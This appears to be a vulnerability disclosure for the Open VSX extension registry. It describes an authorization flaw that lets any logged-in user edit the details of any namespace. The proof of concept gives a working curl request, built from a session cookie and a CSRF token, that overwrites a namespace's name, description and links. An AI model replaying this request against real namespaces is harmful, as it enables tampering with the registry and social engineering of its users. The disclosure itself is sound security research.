Description
The /user/namespace/{namespace}/details API allows any authenticated user to edit the details of every namespace, even if they are not an owner of that namespace or are not a member of it at all.
The details include:
- name
- displayName
- description
- website
- supportLink
- socialLinks
PoC
- Visit https://open-vsx.org/
- Login via a GitHub user who does not have any privilege over any namespace
- Take note of the session cookie
- Visit the following URL: https://open-vsx.org/user/csrf
- Replay the following request through curl after having replaced the $COOKIE placeholder with the value obtained at step 3, the $CSRF_TOKEN placeholder with the value obtained at step 4, and the $NAMESPACE placeholder with the name of the namespace to edit:

```bash
curl -H "X-Csrf-Token: $CSRF_TOKEN" -H "Content-Type: application/json" -b "$COOKIE" \
  --data-binary $'{\"name\":\"c\",\"displayName\":\"PoC\",\"description\":\"PoC by smaury, maitai, and zi0black\",\"website\":\"https://www.shielder.com\",\"supportLink\":\"\",\"socialLinks\":{\"linkedin\":\"https://www.linkedin.com/company/shielder\",\"twitter\":\"https://twitter.com/ShielderSec\",\"github\":\"https://github.com/ShielderSec\"}}' \
  "https://open-vsx.org/user/namespace/$NAMESPACE/details"
```
A live exploitation attempt can be observed at https://open-vsx.org/namespace/c, a namespace that is not owned by the ShielderTest user, which is the user who edited it.
Impact
An attacker can update the information of any namespace, inserting misleading content into the namespace name, description, website, support URL, and social links.
This can be abused as part of social engineering attacks.
Reporters
- smaury Oisfi of Shielder
- zi0Black of Aptos Labs
- maitai